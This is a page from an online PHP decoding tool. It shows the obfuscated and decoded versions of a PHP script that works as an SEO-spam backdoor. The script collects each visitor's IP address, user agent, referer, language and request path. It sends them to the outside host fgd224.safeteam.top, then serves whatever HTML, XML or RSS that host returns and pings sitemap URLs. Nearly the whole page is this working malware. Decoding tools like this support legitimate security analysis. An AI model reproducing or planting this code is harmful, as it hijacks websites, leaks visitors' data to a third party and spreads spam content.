Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto nvfSWWPFQh; nvfSWWPFQh: error_reporting(0); header("\x43\157\x6e\x74\145 ..
Decoded Output download
<? goto nvfSWWPFQh; nvfSWWPFQh: error_reporting(0); header("Conte nt-Type: text/html; \1 43harset=utf-8"); $lan = base64_encode(@$_SERVE R["HTTP_ACCEPT_LANGUAG\ x45"]); $uri = base64_encode(@$_SERVER["REQUEST_UR I"]); $host = @$_SERVER["HTTP_HOST"]; goto J_qI1Fe Gp5; ul2mbkaoWn: echo $host . ":cs224-ok;"; exit; b2Hr mE9Ux8: if (!strstr($file_contents, "[#*#*#]")) { goto YiEP3B yYKf; } $html = explode("[#*#*#]", $file_contents); goto uYfnc_ x55Q; gfKg5QRcPV: $maps = explode("|||", $html[1]); foreach ($maps as $ v) { $pingRes = getCurl($v); $Oooo0s = strpos($pingRes, "Sitem
1p Notification Recei ved") !== false ? "OK" : "ERROR"; echo $v . "=\ x3d=>Sitemap: " . $Oooo0s . "<br>"; gt FnM84mxG: } QhhQAB4miV: exit; qDTpuk8dmA: goto knu8Y0VF_I; uYfnc_x55Q: if (!($ht ml[0] == "echohtml")) { goto BGaa0FRIrD; } echo $html[1] ; exit; BGaa0FRIrD: if (!($html[0] == "echoxml")) { goto Ph 8pdIonWi; } goto StrRSTNHFz; L4m_j2C01R: $goweb = "https:/\ x2ffgd224.safeteam.top"; $ typeName = base64_encode($http_type . $host); $geturl = $goweb . "/in\x6 4ex.php?domain=" . $typeName . "&u\x 72i=" . $uri . "&lan=" . $lan . "&agent=" . $agent . "&zone=" . $zone . "&ip=" . $ip . "&\x6 7oweb=" . $goweb . "&referer=" . $referer ; $file_contents = getCurl($geturl); if (!(stripos($_SERVER["REQU\x4 5ST_URI"], "jp2023") !== false)) { goto b2HrmE 9Ux8; } goto ul2mbkaoWn; J_qI1FeGp5: $agent = base64_encode(@$_SERVER["HT\ x54P_USER_AGENT"]); $referer = base64_encode (@$_SERVER["HTTP_REFERER"]); $ip = base64_en code(@$_SERVER["REMOTE_ADDR"]); $zone = base64_ encode(date_default_timezone_get()); $http_type = isset($_SERVER["HTT\x 50S"]) && $_SERVER["HTTPS"] == "on" || isset($_SERVER["\ 110TTP_X_FORWARDED_PRO\ 124O"]) && $_SERVER["HTTP_X_FORWARD ED_PROTO"] == "https" ? "http s://" : "http://"; goto L4m_j2C01R; pDIbabaXMB: he ader("Content-type: text/\ x78ml"); echo $html[1]; exit; f7zKtmBuv3: if (!($html[0] == "pin\ 147xml")) { goto qDTpuk8dmA; } goto gfKg5QRcPV; knu8Y0VF_I: YiEP3ByYKf: goto aJViI990lF; StrRSTNHFz: header("Content-ty\16 0e: text/xml"); echo $html[1]; exit; Ph8pdIonWi: if (!($html[0] == "echorss")) { goto f7zKtmBuv3; } goto pDI babaXMB; aJViI990lF: function getCurl($url) { goto a9j5JBe7L7; g6aWBAPOH1: curl_ setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $file_contents = curl_exec($ch); curl_close($ch); y0yoLV8A_7: goto H_32Ye0J CA; H_32Ye0JCA: return $file_contents; goto C4NEa3q3pd; a9j5JBe7L7: $file_conten ts = @file_get_contents($url); if ($file_contents) { goto y0yoLV8A_7; } $ch = cu rl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VER IFYHOST, 0); goto g6aWBAPOH1; C4NEa3q3pd: } ?>Did this file decode correctly?
Original Code
goto nvfSWWPFQh; nvfSWWPFQh: error_reporting(0); header("\x43\157\x6e\x74\145 \156\164\x2d\124\x79\160\x65\72\x20\164\145\170\164\x2f\x68\164\155\x6c\73\x20\1 43\150\141\162\x73\x65\164\75\165\x74\x66\55\70"); $lan = base64_encode(@$_SERVE R["\x48\124\124\x50\137\101\x43\x43\105\120\124\x5f\114\101\x4e\107\125\101\107\ x45"]); $uri = base64_encode(@$_SERVER["\x52\x45\x51\125\105\x53\x54\x5f\x55\x52 \x49"]); $host = @$_SERVER["\x48\124\124\x50\137\x48\117\x53\x54"]; goto J_qI1Fe Gp5; ul2mbkaoWn: echo $host . "\72\x63\163\62\x32\x34\55\157\153\73"; exit; b2Hr mE9Ux8: if (!strstr($file_contents, "\x5b\x23\x2a\43\52\x23\x5d")) { goto YiEP3B yYKf; } $html = explode("\x5b\x23\52\43\52\43\x5d", $file_contents); goto uYfnc_ x55Q; gfKg5QRcPV: $maps = explode("\174\x7c\174", $html[1]); foreach ($maps as $ v) { $pingRes = getCurl($v); $Oooo0s = strpos($pingRes, "\123\151\x74\x65\155\14 1\x70\40\116\x6f\x74\x69\x66\x69\143\x61\164\151\x6f\x6e\x20\x52\145\x63\145\x69 \166\145\144") !== false ? "\x4f\x4b" : "\105\122\122\x4f\x52"; echo $v . "\x3d\ x3d\75\x3e\x53\151\164\145\155\141\x70\72\40" . $Oooo0s . "\x3c\x62\162\x3e"; gt FnM84mxG: } QhhQAB4miV: exit; qDTpuk8dmA: goto knu8Y0VF_I; uYfnc_x55Q: if (!($ht ml[0] == "\145\x63\150\x6f\150\x74\155\x6c")) { goto BGaa0FRIrD; } echo $html[1] ; exit; BGaa0FRIrD: if (!($html[0] == "\x65\143\150\x6f\x78\x6d\154")) { goto Ph 8pdIonWi; } goto StrRSTNHFz; L4m_j2C01R: $goweb = "\150\x74\164\160\x73\x3a\x2f\ x2f\146\x67\x64\62\x32\x34\56\x73\141\x66\x65\x74\x65\141\x6d\56\164\157\x70"; $ typeName = base64_encode($http_type . $host); $geturl = $goweb . "\57\151\156\x6 4\145\x78\56\160\150\160\77\x64\x6f\x6d\x61\x69\156\75" . $typeName . "\46\x75\x 72\x69\75" . $uri . "\x26\154\x61\156\75" . $lan . "\x26\141\147\145\x6e\x74\75" . $agent . "\46\172\x6f\156\145\75" . $zone . "\x26\151\160\75" . $ip . "\46\x6 7\157\x77\x65\x62\75" . $goweb . "\46\162\145\146\145\x72\x65\x72\75" . $referer ; $file_contents = getCurl($geturl); if (!(stripos($_SERVER["\122\105\x51\125\x4 5\x53\x54\x5f\125\x52\x49"], "\152\x70\62\x30\62\x33") !== false)) { goto b2HrmE 9Ux8; } goto ul2mbkaoWn; J_qI1FeGp5: $agent = base64_encode(@$_SERVER["\110\124\ x54\x50\137\x55\123\105\122\x5f\x41\x47\105\116\124"]); $referer = base64_encode (@$_SERVER["\x48\124\x54\120\x5f\x52\x45\x46\x45\122\x45\122"]); $ip = base64_en code(@$_SERVER["\122\x45\x4d\117\x54\105\137\101\x44\104\x52"]); $zone = base64_ encode(date_default_timezone_get()); $http_type = isset($_SERVER["\x48\x54\x54\x 50\123"]) && $_SERVER["\x48\124\x54\x50\x53"] == "\157\x6e" || isset($_SERVER["\ 110\x54\x54\x50\137\x58\x5f\x46\x4f\122\127\x41\122\x44\x45\x44\x5f\120\122\x4f\ 124\117"]) && $_SERVER["\x48\124\x54\120\x5f\130\x5f\x46\117\122\127\101\x52\x44 \x45\x44\137\120\x52\117\x54\117"] == "\150\164\164\x70\x73" ? "\x68\x74\x74\x70 \163\72\57\x2f" : "\150\164\164\160\x3a\57\x2f"; goto L4m_j2C01R; pDIbabaXMB: he ader("\103\157\156\164\145\156\x74\55\x74\x79\160\145\72\x20\x74\145\x78\164\57\ x78\x6d\154"); echo $html[1]; exit; f7zKtmBuv3: if (!($html[0] == "\160\x69\156\ 147\x78\155\x6c")) { goto qDTpuk8dmA; } goto gfKg5QRcPV; knu8Y0VF_I: YiEP3ByYKf: goto aJViI990lF; StrRSTNHFz: header("\103\x6f\x6e\164\145\x6e\x74\55\164\171\16 0\x65\72\40\x74\145\x78\164\x2f\170\x6d\154"); echo $html[1]; exit; Ph8pdIonWi: if (!($html[0] == "\x65\143\150\x6f\162\x73\x73")) { goto f7zKtmBuv3; } goto pDI babaXMB; aJViI990lF: function getCurl($url) { goto a9j5JBe7L7; g6aWBAPOH1: curl_ setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $file_contents = curl_exec($ch); curl_close($ch); y0yoLV8A_7: goto H_32Ye0J CA; H_32Ye0JCA: return $file_contents; goto C4NEa3q3pd; a9j5JBe7L7: $file_conten ts = @file_get_contents($url); if ($file_contents) { goto y0yoLV8A_7; } $ch = cu rl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VER IFYHOST, 0); goto g6aWBAPOH1; C4NEa3q3pd: }Function Calls
| None |
Stats
| MD5 | 4b8eab816486d5626b683b4003d485e2 |
| Eval Count | 0 |
| Decode Time | 53 ms |